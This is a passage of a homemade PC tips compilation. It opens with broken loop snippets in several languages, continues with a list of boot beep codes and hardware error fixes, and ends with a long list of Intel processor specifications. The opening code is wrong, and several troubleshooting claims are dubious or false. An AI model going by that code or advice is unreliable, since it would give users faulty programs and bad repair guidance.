printf(i*i); or
cout<<i; or
system.out.prin tln(i*i);
}
In javascipt:
var i=1;
while(i<=10000)
{
document.write( i*i);
i++;
In php,perlCGI:
var i=1;
while(i<=10000)
{
echo(i*i);
i++;
}

Common Errors in PC & There Solution

1. MONITOR LED IS BLINKING


Check all the connections like Monitor Cable, Data cables, RAM, Display Card ,
CPU connections.

2. CONTINUOS THREE BEEPS


Problem in RAM Connection.

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

3. THREE BEEPS (1 Long 2 Short)


Problem in Display Card Connection

4. THREE LONG BEEPS PERIOD WISE


Problem in BIOS or RAM (Basic Input Output System)

5. CONTINUOS NON-STOP BEEPING


Key Board Problem (I.e.; Some Key is pressed for Longer time)

6. FDD LED IS GLOWING CONTINUOSLY


Data cable to be connected properly (twisted cable).

7. NO DISPLAY ON THE SCREEN AT ALL


Hard Disk cable connected wrongly. Connect rightly seeing the Red mark (Faces
power supply) and then Restart.

8. POWER LED IS OFF


a. Check main power cord
b. Check S.M.P.S.
c. Check Mother Board connection

9. SHOWING CMOS ERROR


Replace 3 Volt battery of Mother Board . Set Original Settings Manually.(Refer
CMOS Setup chart)
Enter your search termsSubmit search form

10. SHOWING FDD ERROR OR FLOPPY DRIVE IS NOT WORKING PROPERLY


Check Power cord of FDD , Data Cables , set CMOS & Finally the Check drive.

11. SHOWING HDD ERROR OR HARD DISK FAILURE


a. Check Power Cord
b. Check connection of HDD
c. Check Data cable
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

d. Check Hard Disk parameters in CMOS or Auto detecting Setting Partitions by


Fdisk Command, then format it to set track 0.

12. MOTHER BOARD HANGS DUE TO UNSTABILIZED POWER SUPPLY


a. Check S.M.P.S
b. RAM not functioning properly.
c. Software problem (due to using pirated software)
d. CPU fan not functioning properly.

13. DANCING SCREEN


a. Check Display card connection
b. Virus Problem
c. Video Memory Problem

14. SHAKING SCREEN


a. Earthing problem
b. Magnetic waves comes around.

15. CPU CABINET SHOCK


a. Check Earthing
b. Check main power cord.

16. NON-SYSTEM DISK ERROR


a. Floppy Drive having different disk (Non-Bootable Disk) OR CMOS Parameters
for Hard Disk may not be set properly.
b. Hard Disk Partitions may not be created.
c. Hard Disk may not be formatted.

7. MISSING OPERATING SYSTEM


The System files missing namely Ie; command.com} - User File IO.SYS &
MS_DOS.SYS } - Hidden Files. These above three files required for Start up of the
system that can be transferred by using SYS C: Command OR While the time of
formatting by using Format c:/u/s
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

18. MISSING COMMAND INTERPRETOR


May the file Command.com is corrupted OR Infected by Virus OR Some one has
Erased it.

19. SHOWING I/O ERROR


a. The type of Hard Disk in CMOS may not be set properly.
b. Operating system used for formatting is not valid

20. SHOWING DIVIDE OVER- FLOW MESSAGE


a. May some Directories or Files crash with other files.
b. Use CHKDSK/F or SCANDISK Command to correct it.

21. HARD DISK MAKING NOISE WHILE PROCESSING


a. Unstabilized power supply.
b. Check for Loose Contact.
c. Do not use Y Connectors for Hard Disk.
d. It may create Bad Sector OR Weak Hard Disk.

22. HARD DISK HANGS WHILE PROCESSING


Check for Bad Sector by using CHKDSK or SCANDISK Command. If found format
the Hard Disk and set Partition before that area.(This is the only procedure to use
Hard Disk with Bad Sector) OR (To avoid Bad Sectors use Standard Power Supply)

23. HARD DISK NOT DETECTED


a. Check Power Connector
b. Check Data Cables
c. Check Jumpers

24. PARTITION NOT SHOWN


Operating System where the Hard Disk formatted is not supported with present
Mother Board. For Eg: Hard Disk formatted with Pentium System will hide their
partitions for 486 System.
BY: KHALID CHAUDHARY
PC TIPS AND TRICK

25. MMX/DLL FILE MISSING


May the above files may be corrupted due to power failure or Virus. Make
available above files from other Computer. OR Reinstall Windows 98 Operating
System. (This procedure will not make any effect on existing Data).

26. WINDOWS REGISTRY ERROR


This will happen due to sudden ON/OFF of the system. Final solution is to Reinstall
Operating System.

27. DISPLAY COLOUR DOES NOT MATCH


a. Configure Display Card properly with their CD.
b. The Standard setting for Windows is set it to 800x600 for better performance.

28. UNKNOWN DEVICE FOUND


May the Driver utility is not provided with operating system . Insert Driver CD and
install software for the above Device.

Detail of all types processor

The 4-bit processors


Intel 4004:
First microprocessor (single-chip IC processor)

 Clock rate 740 kHz[1]


 0.07 MIPS
 Bus width 4 bits (multiplexed address/data due to limited pins)
 PMOS
 Number of transistors 2,300 at 10 μm
 Addressable Memory 640 bytes
 Program Memory 4 KB
 One of the earliest Commercial Microprocessors (cf. Four Phase Systems AL1, F14 CADC)
 Originally designed to be used in Busicom calculator

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

MCS-4 Family:

 4004 – CPU
 4001 – ROM & 4-bit Port
 4002 – RAM & 4-bit Port
 4003 – 10-bit Shift Register
 4008 – Memory+I/O Interface
 4009 – Memory+I/O Interface
Intel 4040:
MCS-40 Family:

 4040 – CPU
 4101 – 1024-bit (256 × 4) Static RAM with separate I/O
 4201 – 4 MHz Clock Generator
 4207 – General Purpose Byte I/O Port
 4209 – General Purpose Byte I/O Port
 4211 – General Purpose Byte I/O Port
 4265 – Programmable General Purpose I/O Device
 4269 – Programmable Keyboard Display Device
 4289 – Standard Memory Interface for MCS-4/40
 4308 – 8192-bit (1024 × 8) ROM w/ 4-bit I/O Ports
 4316 – 16384-bit (2048 × 8) Static ROM
 4702 – 2048-bit (256 × 8) EPROM
 4801 – 5.185 MHz Clock Generator Crystal for 4004/4201A or 4040/4201A

The 8-bit processors


8008

 Introduced April 1, 1972


 Clock rate 500 kHz (8008–1: 800 kHz)
 0.05 MIPS
 Bus width 8 bits (multiplexed address/data due to limited pins)
 Enhancement load PMOS logic
 Number of transistors 3,500 at 10 μm
 Addressable memory 16 KB
 Typical in early 8-bit microcomputers, dumb terminals, general calculators, bottling
machines
 Developed in tandem with 4004

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Originally intended for use in the Datapoint 2200 microcomputer


 Key volume deployment in Texas Instruments 742 microcomputer in >3,000 Ford
dealerships
8080

 Introduced April 1, 1974


 Clock rate 2 MHz (very rare 8080B: 3 MHz)
 0.29 MIPS[2]
 Bus width 8 bits data, 16 bits address
 Enhancement load NMOS logic
 Number of transistors 4,500, 6 μm
 Assembly language downwards compatible with 8008.
 Addressable memory 64 KB
 Up to 10X the performance of the 8008
 Used in the Altair 8800, Traffic light controller, cruise missile
 Required six support chips versus 20 for the 8008
8085

 Introduced March 1976


 Clock rate 3 MHz[3]
 0.37 MIPS
 Bus width 8 bits data, 16 bits address
 Depletion load NMOS logic
 Number of transistors 6,500 at 3 μm
 Binary compatible downwards with the 8080.
 Used in Toledo scales. Also was used as a computer peripheral controller – modems, hard
disks, printers, etc.
 CMOS 80C85 in Mars Sojourner, Radio Shack Model 100 portable.
 High level of integration, operating for the first time on a single 5-volt power supply, from 12
volts previously. Also featured serial I/O, 3 maskable interrupts, 1 non-maskable interrupt, 1
externally expandable interrupt w/[8259], status, DMA.
 MCS-85 family contains processors and peripherals.
Microcontrollers
They are ICs with CPU, RAM, ROM (or PROM or EPROM), I/O Ports, Timers & Interrupts
Intel 8048:

 Single accumulator Harvard architecture


MCS-48 family:

 8020 – Single-Component 8-bit Microcontroller

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 8021 – Single-Component 8-bit Microcontroller


 8022 – Single-Component 8-bit Microcontroller With On-Chip A/D Converter
 8035 – Single-Component 8-bit Microcontroller
 8039 – Single-Component 8-bit Microcontroller
 8040 – Single-Component 8-bit Microcontroller
 8041 – Universal Peripheral Interface 8-bit Slave Microcontroller
 8641 – Universal Peripheral Interface 8-bit Slave Microcontroller
 8741 – Universal Peripheral Interface 8-bit Slave Microcontroller
 8042 – Universal Peripheral Interface 8-bit Slave Microcontroller
 8742 – Universal Peripheral Interface 8-bit Slave Microcontroller
 8243 – Input/Output Expander
 8048 – Single-Component 8-bit Microcontroller
 8048 – Single-Component 8-bit Microcontroller
 8748 – Single-Component 8-bit Microcontroller
 8048 – Single-Component 8-bit Microcontroller
 8049 – Single-Component 8-bit Microcontroller
 8749 – Single-Component 8-bit Microcontroller
 8050 – Single-Component 8-bit Microcontroller
Intel 8051:

 Single accumulator Harvard architecture


MCS-51 Family:

 8031 – 8-bit Control-Oriented Microcontroller


 8032 – 8-bit Control-Oriented Microcontroller
 8044 – High Performance 8-bit Microcontroller
 8344 – High Performance 8-bit Microcontroller
 8744 – High Performance 8-bit Microcontroller
 8051 – 8-bit Control-Oriented Microcontroller
 8052 – 8-bit Control-Oriented Microcontroller
 8054 – 8-bit Control-Oriented Microcontroller
 8058 – 8-bit Control-Oriented Microcontroller
 8351 – 8-bit Control-Oriented Microcontroller
 8352 – 8-bit Control-Oriented Microcontroller
 8354 – 8-bit Control-Oriented Microcontroller
 8358 – 8-bit Control-Oriented Microcontroller
 8751 – 8-bit Control-Oriented Microcontroller
 8752 – 8-bit Control-Oriented Microcontroller
 8754 – 8-bit Control-Oriented Microcontroller
 8758 – 8-bit Control-Oriented Microcontroller
Intel 80151:

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Single accumulator Harvard architecture


MCS-151 Family:

 80151 – High Performance 8-bit Control-Oriented Microcontroller


 83151 – High Performance 8-bit Control-Oriented Microcontroller
 87151 – High Performance 8-bit Control-Oriented Microcontroller
 80152 – High Performance 8-bit Control-Oriented Microcontroller
 83152 – High Performance 8-bit Control-Oriented Microcontroller
Intel 80251:

 Single accumulator Harvard architecture


MCS-251 Family:

 80251 – 8/16/32-bit Microcontroller


 80252 – 8/16/32-bit Microcontroller
 80452 – 8/16/32-bit Microcontroller
 83251 – 8/16/32-bit Microcontroller
 87251 – 8/16/32-bit Microcontroller
 87253 – 8/16/32-bit Microcontroller
MCS-96 Family:

 8094 – 16-bit Microcontroller (48-Pin ROMLess Without A/D)


 8095 – 16-bit Microcontroller (48-Pin ROMLess With A/D)
 8096 – 16-bit Microcontroller (68-Pin ROMLess Without A/D)
 8097 – 16-bit Microcontroller (68-Pin ROMLess With A/D)
 8394 – 16-bit Microcontroller (48-Pin With ROM Without A/D)
 8395 – 16-bit Microcontroller (48-Pin With ROM With A/D)
 8396 – 16-bit Microcontroller (68-Pin With ROM Without A/D)
 8397 – 16-bit Microcontroller (68-Pin With ROM With A/D)
 8794 – 16-bit Microcontroller (48-Pin With EROM Without A/D)
 8795 – 16-bit Microcontroller (48-Pin With EROM With A/D)
 8796 – 16-bit Microcontroller (68-Pin With EROM Without A/D)
 8797 – 16-bit Microcontroller (68-Pin With EROM With A/D)
 8098 – 16-bit Microcontroller
 8398 – 16-bit Microcontroller
 8798 – 16-bit Microcontroller
 80196 – 16-bit Microcontroller
 83196 – 16-bit Microcontroller
 87196 – 16-bit Microcontroller
 80296 – 16-bit Microcontroller

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

The bit-slice processor


3000 Family:

Intel D3002

Introduced in the third quarter of 1974, these components used bipolarSchottky transistors.
Each component implemented two bits of a processor function; packages could be
interconnected to build a processor with any desired word length. Members of the family:

 3001 – Microcontrol Unit


 3002 – 2-bit Arithmetic Logic Unit slice
 3003 – Look-ahead Carry Generator
 3205 – High-performance 1 Of 8 Binary Decoder
 3207 – Quad Bipolar-to-MOS Level Shifter and Driver
 3208 – Hex Sense Amp and Latch for MOS Memories
 3210 – TTL-to-MOS Level Shifter and High Voltage Clock Driver
 3211 – ECL-to-MOS Level Shifter and High Voltage Clock Driver
 3212 – Multimode Latch Buffer
 3214 – Interrupt Control Unit
 3216 – Parallel,Inverting Bi-Directional Bus Driver
 3222 – Refresh Controller for 4K NMOS DRAMs
 3226 – Parallel, Inverting Bi-Directional Bus Driver
 3232 – Address Multiplexer and Refresh Counter for 4K DRAMs
 3242 – Address Multiplexer and Refresh Counter for 16K DRAMs
 3245 – Quad Bipolar TTL-to-MOS Level Shifter and Driver for 4K
 3246 – Quad Bipolar ECL-to-MOS Level Shifter and Driver for 4K
 3404 – High-performance 6-bit Latch
 3408 – Hex Sense Amp and Latch for MOS Memories

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 3505 - Next generation processor


Bus width 2*n bits data/address (depending on number n of slices used)

The 16-bit processors: MCS-86 family


8086:

 Introduced June 8, 1978


 Clock rates:
 5 MHz with 0.33 MIPS[3]
 8 MHz with 0.66 MIPS
 10 MHz with 0.75 MIPS
 The memory is divided into odd and even banks; it accesses both banks concurrently to
read 16 bits of data in one clock cycle
 Bus width 16 bits data, 20 bits address
 Number of transistors 29,000 at 3 μm
 Addressable memory 1 megabyte
 Up to 10X the performance of 8080
 Used in portable computing, and in the IBM PS/2 Model 25 and Model 30. Also used in
the AT&T PC6300 / Olivetti M24, a popular IBM PC-compatible (predating the IBM PS/2
line).
 Used segment registers to access more than 64 KB of data at once, which many
programmers complained made their work excessively difficult.[citation needed]
 The first x86 CPU.
 Later renamed the iAPX 86[4]

8088:

 Introduced June 1, 1979


 Clock rates:
 5 MHz with 0.33 MIPS
 8 MHz with 0.66 MIPS[3]
 Internal architecture 16 bits
 External bus Width 8 bits data, 20 bits address
 Number of transistors 29,000 at 3 μm
 Addressable memory 1 megabyte
 Identical to 8086 except for its 8-bit external bus (hence an 8 instead of a 6 at the end);
identical Execution Unit (EU), different Bus Interface Unit (BIU)[4]

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Used in IBM PCs and PC clones


 Later renamed the iAPX 88[4]
80186:

 Introduced 1982
 Clock rates
 6 MHz with > 1 MIPS
 Number of transistors 29,000 at 2 μm
 Included two timers, a DMA controller, and an interrupt controller on the chip in addition to
the processor (these were at fixed addresses which differed from the IBM PC, making it
impossible to build a 100% PC-compatible computer around the 80186).
 Added a few opcodes and exceptions to the 8086 design; otherwise identical instruction set
to 8086 and 8088.
 Used mostly in embedded applications – controllers, point-of-sale systems, terminals, and
the like
 Used in several non-PC-Compatible MS-DOS computers including RM Nimbus, Tandy
2000, and CP/M 86 Televideo PM16 server
 Later renamed the iAPX 186
80188:

 A version of the 80186 with an 8-bit external data bus


 Later renamed the iAPX 188
80286:

 Introduced February 1, 1982


 Clock rates:
 6 MHz with 0.9 MIPS
 8 MHz, 10 MHz with 1.5 MIPS
 12.5 MHz with 2.66 MIPS
 16 MHz, 20 MHz and 25 MHz available.
 Bus width: 16 bits data, 24 bits address.
 Included memory protection hardware to support multitasking operating systems with per-
process address space.
 Number of transistors 134,000 at 1.5 μm
 Addressable memory 16 MB
 Added protected-mode features to 8086 with essentially the same instruction set
 3–6X the performance of the 8086
 Widely used in IBM-PC AT and AT clones contemporary to it.

32-bit processors: the non-x86 microprocessors


BY: KHALID CHAUDHARY
PC TIPS AND TRICK

iAPX 432:

 Introduced January 1, 1981 as Intel's first 32-bit microprocessor


 Multi-chip CPU; Intel's first 32-bit microprocessor
 Object/capability architecture
 Microcoded operating system primitives
 One terabyte virtual address space
 Hardware support for fault tolerance
 Two-chip General Data Processor (GDP), consists of 43201 and 43202
 43203 Interface Processor (IP) interfaces to I/O subsystem
 43204 Bus Interface Unit (BIU) simplifies building multiprocessor systems
 43205 Memory Control Unit (MCU)
 Architecture and execution unit internal data base paths 32 bit
 Clock rates:
 5 MHz
 7 MHz
 8 MHz
i960 aka 80960:

 Introduced April 5, 1988


 RISC-like 32-bit architecture
 Predominantly used in embedded systems
 Evolved from the capability processor developed for the BiiN joint venture with Siemens
 Many variants identified by two-letter suffixes.
i860 aka 80860:

 Introduced February 26, 1989


 RISC 32/64-bit architecture, with floating point pipeline characteristics very visible to
programmer
 Used in the Intel iPSC/860 Hypercube parallel supercomputer
 Mid-life kicker in the i870 processor (primarily a speed bump, some refinement/extension of
instruction set)
 Used in the Intel Delta massively parallel supercomputer prototype, emplaced at California
Institute of Technology
 Used in the Intel Paragon massively parallel supercomputer, emplaced at Sandia National
Laboratory
XScale:

 Introduced August 23, 2000


 32-bit RISC microprocessor based on the ARM architecture

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Many variants, such as the PXA2xx applications processors, IOP3xx I/O processors and
IXP2xxx and IXP4xx network processors.
32-bit processors: the 80386 range:
80386DX:

 Introduced October 17, 1985


 Clock rates:
 16 MHz with 5 MIPS
 20 MHz with 6 to 7 MIPS, introduced February 16, 1987
 25 MHz with 7.5 MIPS, introduced April 4, 1988
 33 MHz with 9.9 MIPS (9.4 SPECint92 on Compaq/i 16K L2), introduced April 10, 1989
 Bus width 32 bits data, 32 bits address
 Number of transistors 275,000 at 1 μm
 Addressable memory 4 GB
 Virtual memory 64 TB
 First x86 chip to handle 32-bit data sets
 Reworked and expanded memory protection support including paged virtual memory and
virtual-86 mode, features required at the time by Xenix and Unix. This memory capability
spurred the development and availability of OS/2 and is a fundamental requirement for
modern operating systems like Linux, Windows, and OS X.
 Used in desktop computing
 Later renamed Intel386TM DX
80386SX:

 Introduced June 16, 1988


 Clock rates:
 16 MHz with 2.5 MIPS
 20 MHz with 3.1 MIPS, introduced January 25, 1989
 25 MHz with 3.9 MIPS, introduced January 25, 1989
 33 MHz with 5.1 MIPS, introduced October 26, 1992
 Internal architecture 32 bits
 External data bus width 16 bits
 External address bus width 24 bits
 Number of transistors 275,000 at 1 μm
 Addressable memory 16 MB
 Virtual memory 32 GB
 Narrower buses enable low-cost 32-bit processing
 Used in entry-level desktop and portable computing
 No Math Co-Processor

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 No commercial Software used for protected mode or virtual storage for many years
 Later renamed Intel386TM SX
80376:

The Intel i376 is an embedded version of the i386SX.

 Introduced January 16, 1989; discontinued June 15, 2001


 Variant of 386SX intended for embedded systems
 No "real mode", starts up directly in "protected mode"
 Replaced by much more successful 80386EX from 1994
80386SL:

 Introduced October 15, 1990


 Clock rates:
 20 MHz with 4.21 MIPS
 25 MHz with 5.3 MIPS, introduced September 30, 1991
 Internal architecture 32 bits
 External bus width 16 bits
 Number of transistors 855,000 at 1 μm
 Addressable memory 4 GB
 Virtual memory 1 TB
 First chip specifically made for portable computers because of low power consumption of
chip
 Highly integrated, includes cache, bus, and memory controllers
80386EX:

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Introduced August 1994


 Variant of 80386SX intended for embedded systems
 Static core, i.e. may run as slowly (and thus, power efficiently) as desired, down to full halt
 On-chip peripherals:
 Clock and power management
 Timers/counters
 Watchdog timer
 Serial I/O units (sync and async) and parallel I/O
 DMA
 RAM refresh
 JTAG test logic
 Significantly more successful than the 80376
 Used aboard several orbiting satellites and microsatellites
 Used in NASA's FlightLinux project

32-bit processors: the 80486 range:


80486DX:

 Introduced April 10, 1989


 Clock rates:
 25 MHz with 20 MIPS (16.8 SPECint92, 7.40 SPECfp92)
 33 MHz with 27 MIPS (22.4 SPECint92 on Micronics M4P 128 KB L2), introduced May
7, 1990
 50 MHz with 41 MIPS (33.4 SPECint92, 14.5 SPECfp92 on Compaq/50L 256 KB L2),
introduced June 24, 1991
 Bus width 32 bits
 Number of transistors 1.2 million at 1 μm; the 50 MHz was at 0.8 μm
 Addressable memory 4 GB
 Virtual memory 1 TB
 Level 1 cache of 8 KB on chip
 Math coprocessor on chip
 50X performance of the 8088
 Officially named Intel486TM DX
 Used in Desktop computing and servers
 Family 4 model 1

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

80486SX:

 Introduced April 22, 1991


 Clock rates:
 16 MHz with 13 MIPS
 20 MHz with 16.5 MIPS, introduced September 16, 1991
 25 MHz with 20 MIPS (12 SPECint92), introduced September 16, 1991
 33 MHz with 27 MIPS (15.86 SPECint92), introduced September 21, 1992
 Bus width 32 bits
 Number of transistors 1.185 million at 1 μm and 900,000 at 0.8 μm
 Addressable memory 4 GB
 Virtual memory 1 TB
 Identical in design to 486DX but without math coprocessor. The first version was an
80486DX with disabled math coprocessor in the chip and different pin configuration. If the
user needed math coprocessor capabilities, he must add 487SX which was actually an
486DX with different pin configuration to prevent the user from installing a 486DX instead of
487SX, so with this configuration 486SX+487SX you had 2 identical CPU's with only 1
effectively turned on
 Officially named Intel486TM SX
 Used in low-cost entry to 486 CPU desktop computing, as well as extensively used in low
cost mobile computing.
 Upgradable with the Intel OverDrive processor
 Family 4 model 2
80486DX2:

 Introduced March 3, 1992


Runs at twice the speed of the external bus (FSB). Fits on Socket 3

 Clock rates:
 40 MHz
 50 MHz
 66 MHz
 Officially named Intel486TM DX2
 Family 4 model 3
80486SL:

 Introduced November 9, 1992


 Clock rates:
 20 MHz with 15.4 MIPS
 25 MHz with 19 MIPS

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 33 MHz with 25 MIPS


 Bus width 32 bits
 Number of transistors 1.4 million at 0.8 μm
 Addressable memory 4 GB
 Virtual memory 1 TB
 Officially named Intel486TM SL
 Used in notebook computers
 Family 4 model 4
80486DX4:

 Introduced March 7, 1994


 Clock rates:
 75 MHz with 53 MIPS (41.3 SPECint92, 20.1 SPECfp92 on Micronics M4P 256 KB L2)
 100 MHz with 70.7 MIPS (54.59 SPECint92, 26.91 SPECfp92 on Micronics M4P 256
KB L2)
 Number of transistors 1.6 million at 0.6 μm
 Bus width 32 bits
 Addressable memory 4 GB
 Virtual memory 64 TB
 Pin count 168 PGA Package, 208 sq ftP Package
 Officially named Intel486TM DX4
 Used in high performance entry-level desktops and value notebooks
 Family 4 model 8

32-bit processors: P5 microarchitecture:


Original Pentium:

 Bus width 64 bits


 System bus clock rate 60 or 66 MHz
 Address bus 32 bits
 Addressable Memory 4 GB
 Virtual Memory 64 TB
 Superscalar architecture
 Runs on 5 volts
 Used in desktops
 8 KB of instruction cache
 8 KB of data cache

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 P5 – 0.8 μm process technology


 Introduced March 22, 1993
 Number of transistors 3.1 million
 Socket 4 273 pin PGA processor package
 Package dimensions 2.16" × 2.16"
 Family 5 model 1
 Variants
 60 MHz with 100 MIPS (70.4 SPECint92, 55.1 SPECfp92 on Xpress 256 KB L2)
 66 MHz with 112 MIPS (77.9 SPECint92, 63.6 SPECfp92 on Xpress 256 KB L2)
 P54 – 0.6 μm process technology
 Socket 5 296/320 pin PGA package
 Number of transistors 3.2 million
 Variants
 75 MHz with 126.5 MIPS (2.31 SPECint95, 2.02 SPECfp95 on Gateway P5 256K
L2)
 Introduced October 10, 1994
 90, 100 MHz with 149.8 and 166.3 MIPS respectively (2.74 SPECint95, 2.39
SPECfp95 on Gateway P5 256K L2 and 3.30 SPECint95, 2.59 SPECfp95 on
Xpress 1ML2 respectively)
Introduced March 7, 1994
 P54CQS – 0.35 μm process technology
 Socket 5 296/320 pin PGA package
 Number of transistors 3.2 million
 Variants
 120 MHz with 203 MIPS (3.72 SPECint95, 2.81 SPECfp95 on Xpress 1MB L2)
 Introduced March 27, 1995
 P54CS – 0.35 μm process technology
 Number of transistors 3.3 million
 90 mm² die size
 Family 5 model 2
 Variants
 Socket 5 296/320 pin PGA package
 133 MHz with 218.9 MIPS (4.14 SPECint95, 3.12 SPECfp95 on Xpress 1MB L2)
 Introduced June 12, 1995

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 150, 166 MHz with 230 and 247 MIPS respectively


 Introduced January 4, 1996
 Socket 7 296/321 pin PGA package
 200 MHz with 270 MIPS (5.47 SPECint95, 3.68 SPECfp95)
 Introduced June 10, 1996
Pentium with MMX Technology:

 P55C – 0.35 μm process technology


 Introduced January 8, 1997
 Intel MMX (instruction set) support
 Socket 7 296/321 pin PGA (pin grid array) package
 16 KB L1 instruction cache
 16 KB L1 data cache
 Number of transistors 4.5 million
 System bus clock rate 66 MHz
 Basic P55C is family 5 model 4, mobile are family 5 model 7 and 8
 Variants
 166, 200 MHz Introduced January 8, 1997
 233 MHz Introduced June 2, 1997
 133 MHz (Mobile)
 166, 266 MHz (Mobile) Introduced January 12, 1998
 200, 233 MHz (Mobile) Introduced September 8, 1997
 300 MHz (Mobile) Introduced January 7, 1999

32-bit processors: P6/Pentium M microarchitecture:


Pentium Pro:

 Introduced November 1, 1995


 Precursor to Pentium II and III
 Primarily used in server systems
 Socket 8 processor package (387 pins) (Dual SPGA)
 Number of transistors 5.5 million
 Family 6 model 1
 0.6 μm process technology
 16 KB L1 cache

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 256 KB integrated L2 cache


 60 MHz system bus clock rate
 Variants
 150 MHz
 0.35 μm process technology, or 0.35 μm CPU with 0.6 μm L2 cache
 Number of transistors 5.5 million
 512 KB or 256 KB integrated L2 cache
 60 or 66 MHz system bus clock rate
 Variants
 166 MHz (66 MHz bus clock rate, 512 KB 0.35 μm cache) Introduced November 1,
1995
 180 MHz (60 MHz bus clock rate, 256 KB 0.6 μm cache) Introduced November 1,
1995
 200 MHz (66 MHz bus clock rate, 256 KB 0.6 μm cache) Introduced November 1,
1995
 200 MHz (66 MHz bus clock rate, 512 KB 0.35 μm cache) Introduced November 1,
1995
 200 MHz (66 MHz bus clock rate, 1 MB 0.35 μm cache) Introduced August 18, 1997
Pentium II:

 Introduced May 7, 1997


 Pentium Pro with MMX and improved 16-bit performance
 242-pin Slot 1 (SEC) processor package
 Voltage identification pins
 Number of transistors 7.5 million
 32 KB L1 cache
 512 KB ½ bandwidth external L2 cache
 The only Pentium II that did not have the L2 cache at ½ bandwidth of the core was the
Pentium II 450 PE.
 Klamath – 0.35 μm process technology (233, 266, 300 MHz)
 66 MHz system bus clock rate
 Family 6 model 3
 Variants
 233, 266, 300 MHz Introduced May 7, 1997
 Deschutes – 0.25 μm process technology (333, 350, 400, 450 MHz)
 Introduced January 26, 1998

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 66 MHz system bus clock rate (333 MHz variant), 100 MHz system bus clock rate for all
models after
 Family 6 model 5
 Variants
 333 MHz Introduced January 26, 1998
 350, 400 MHz Introduced April 15, 1998
 450 MHz Introduced August 24, 1998
 233, 266 MHz (Mobile) Introduced April 2, 1998
 333 MHz Pentium II Overdrive processor for Socket 8 Introduced August 10,
1998; Engineering Sample Photo[dead link]
 300 MHz (Mobile) Introduced September 9, 1998
 333 MHz (Mobile)
Celeron (Pentium II-based)

 Covington – 0.25 μm process technology


 Introduced April 15, 1998
 242-pin Slot 1 SEPP (Single Edge Processor Package)
 Number of transistors 7.5 million
 66 MHz system bus clock rate
 Slot 1
 32 KB L1 cache
 No L2 cache
 Variants
 266 MHz Introduced April 15, 1998
300 MHz Introduced June 9, 1998
 Mendocino – 0.25 μm process technology
 Introduced August 24, 1998
 242-pin Slot 1 SEPP (Single Edge Processor Package), Socket 370 PPGA package
 Number of transistors 19 million
 66 MHz system bus clock rate
 Slot 1, Socket 370
 32 KB L1 cache
 128 KB integrated cache
 Family 6 model 6

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Variants
 300, 333 MHz Introduced August 24, 1998
 366, 400 MHz Introduced January 4, 1999
 433 MHz Introduced March 22, 1999
 466 MHz
 500 MHz Introduced August 2, 1999
 533 MHz Introduced January 4, 2000
 266 MHz (Mobile)
 300 MHz (Mobile)
 333 MHz (Mobile) Introduced April 5, 1999
 366 MHz (Mobile)
 400 MHz (Mobile)
 433 MHz (Mobile)
 450 MHz (Mobile) Introduced February 14, 2000
 466 MHz (Mobile)
 500 MHz (Mobile) Introduced February 14, 2000

Pentium II Xeon (chronological entry)

 Introduced June 29, 1998


 See main entry
Pentium III:

 Katmai – 0.25 μm process technology


 Introduced February 26, 1999
 Improved PII, i.e. P6-based core, now including Streaming SIMD Extensions (SSE)
 Number of transistors 9.5 million
 512 KB ½ bandwidth L2 External cache
 242-pin Slot 1 SECC2 (Single Edge Contact cartridge 2) processor package
 System Bus clock rate 100 MHz, 133 MHz (B-models)
 Slot 1
 Family 6 model 7
 Variants
 450, 500 MHz Introduced February 26, 1999
 550 MHz Introduced May 17, 1999

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 600 MHz Introduced August 2, 1999


 533, 600 MHz Introduced (133 MHz bus clock rate) September 27, 1999
 Coppermine – 0.18 μm process technology
 Introduced October 25, 1999
 Number of transistors 28.1 million
 256 KB Advanced Transfer L2 Cache (Integrated)
 242-pin Slot-1 SECC2 (Single Edge Contact cartridge 2) processor package, 370-
pin FC-PGA (Flip-chip pin grid array) package
 System Bus clock rate 100 MHz (E-models), 133 MHz (EB models)
 Slot 1, Socket 370
 Family 6 model 8
 Variants
 500 MHz (100 MHz bus clock rate)
 533 MHz
 550 MHz (100 MHz bus clock rate)
 600 MHz
 600 MHz (100 MHz bus clock rate)
 650 MHz (100 MHz bus clock rate) Introduced October 25, 1999
 667 MHz Introduced October 25, 1999
 700 MHz (100 MHz bus clock rate) Introduced October 25, 1999
 733 MHz Introduced October 25, 1999
 750, 800 MHz (100 MHz bus clock rate) Introduced December 20, 1999
 850 MHz (100 MHz bus clock rate) Introduced March 20, 2000
 866 MHz Introduced March 20, 2000
 933 MHz Introduced May 24, 2000
 1000 MHz Introduced March 8, 2000 (not widely available at time of release)
 1100 MHz
 1133 MHz (first version recalled, later re-released)
 400, 450, 500 MHz (Mobile) Introduced October 25, 1999
 600, 650 MHz (Mobile) Introduced January 18, 2000
 700 MHz (Mobile) Introduced April 24, 2000
 750 MHz (Mobile) Introduced June 19, 2000
 800, 850 MHz (Mobile) Introduced September 25, 2000
 900, 1000 MHz (Mobile) Introduced March 19, 2001

BY: KHALID CHAUDHARY


PC TIPS AND TRICK

 Tualatin – 0.13 μm process technology


 Introduced July 2001
 Number of transistors 28.1 million
 32 KB L1 cache
 256 KB or 512 KB Advanced Transfer L2 cache (integrated)
 370-pin FC-PGA2 (flip-chip pin grid array) package
 133 MHz system bus clock rate
 Socket 370
 Family 6 model 11
 Variants
 1133 MHz (256 KB L2)
 1133 MHz (512 KB L2)
 1200 MHz
 1266 MHz (512 KB L2)
 1333 MHz
 1400 MHz (512 KB L2)
Pentium II and III Xeon:

 PII Xeon
 Variants
